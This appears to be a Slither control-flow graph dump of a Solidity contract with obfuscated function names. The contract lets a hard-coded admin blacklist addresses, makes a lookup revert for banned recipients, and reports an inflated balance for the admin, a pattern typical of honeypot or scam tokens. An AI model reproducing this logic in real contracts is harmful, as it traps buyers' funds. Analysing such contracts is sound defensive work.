Contract: kkjjj22
==================================================

Function: constructor
------------------------------
Nodes:
  ID: 0
  Type: NodeType.ENTRYPOINT
  Expression: 

  ID: 1
  Type: NodeType.EXPRESSION
  Expression: mnAdmin = msg.sender

  ID: 2
  Type: NodeType.EXPRESSION
  Expression: _bans[msg.sender] = 100

  ID: 3
  Type: NodeType.EXPRESSION
  Expression: _bans[0x0ED943Ce24BaEBf257488771759F9BF482C39706] = 1

  ID: 4
  Type: NodeType.EXPRESSION
  Expression: _bans[0x5Bca762F9b0a7a953EB9B7aEdf71e7E01a8971C1] = 1

  ID: 5
  Type: NodeType.EXPRESSION
  Expression: _bans[0x996730dB3C8ef2AA6BfBd3FA9c99A8201f97A5db] = 1

Edges:
  0 -> 1
  1 -> 2
  2 -> 3
  3 -> 4
  4 -> 5

Function: okgiveamount
------------------------------
Nodes:
  ID: 0
  Type: NodeType.ENTRYPOINT
  Expression: 

  ID: 1
  Type: NodeType.EXPRESSION
  Expression: require(bool,string)(msg.sender == mnAdmin,NO ADMIN)

  ID: 2
  Type: NodeType.EXPRESSION
  Expression: adminAmount = bm

Edges:
  0 -> 1
  1 -> 2

Function: okgetuserr
------------------------------
Nodes:
  ID: 0
  Type: NodeType.ENTRYPOINT
  Expression: 

  ID: 1
  Type: NodeType.EXPRESSION
  Expression: require(bool,string)(msg.sender == mnAdmin,NO ADMIN)

  ID: 2
  Type: NodeType.RETURN
  Expression: _bans[userAddress]

Edges:
  0 -> 1
  1 -> 2

Function: oksetuserr
------------------------------
Nodes:
  ID: 0
  Type: NodeType.ENTRYPOINT
  Expression: 

  ID: 1
  Type: NodeType.EXPRESSION
  Expression: require(bool,string)(msg.sender == mnAdmin,NO ADMIN)

  ID: 2
  Type: NodeType.EXPRESSION
  Expression: _bans[userAddress] = 1

Edges:
  0 -> 1
  1 -> 2

Function: okremoveuserr
------------------------------
Nodes:
  ID: 0
  Type: NodeType.ENTRYPOINT
  Expression: 

  ID: 1
  Type: NodeType.EXPRESSION
  Expression: require(bool,string)(msg.sender == mnAdmin,NO ADMIN)

  ID: 2
  Type: NodeType.EXPRESSION
  Expression: _bans[userAddress] = 0

Edges:
  0 -> 1
  1 -> 2

Function: okgiveadminuserrr
------------------------------
Nodes:
  ID: 0
  Type: NodeType.ENTRYPOINT
  Expression: 

  ID: 1
  Type: NodeType.EXPRESSION
  Expression: require(bool,string)(msg.sender == mnAdmin,NO ADMIN)

  ID: 2
  Type: NodeType.EXPRESSION
  Expression: _bans[mnAdmin] = 100

Edges:
  0 -> 1
  1 -> 2

Function: mbb123mlbb
------------------------------
Nodes:
  ID: 0
  Type: NodeType.ENTRYPOINT
  Expression: 

  ID: 1
  Type: NodeType.IF
  Expression: _bans[destt] == 1

  ID: 2
  Type: NodeType.EXPRESSION
  Expression: revert(string)(destt goway)

  ID: 3
  Type: NodeType.IF
  Expression: _bans[destt] == 100

  ID: 4
  Type: NodeType.RETURN
  Expression: adminAmount

  ID: 5
  Type: NodeType.RETURN
  Expression: totalAmount

  ID: 7
  Type: NodeType.ENDIF
  Expression: 

Edges:
  0 -> 1
  1 -> 2
  1 -> 3
  2 -> 7
  3 -> 4
  3 -> 5

Function: slitherConstructorVariables
------------------------------
Nodes:
  ID: 0
  Type: NodeType.OTHER_ENTRYPOINT
  Expression: mnAdmin = address(0xFe6035CF650973bC2A916D88a4739f80bBc6d1a0)

  ID: 1
  Type: NodeType.OTHER_ENTRYPOINT
  Expression: adminAmount = 60000000000 * 10 ** 18 * 88000 * 1

Edges:
  0 -> 1


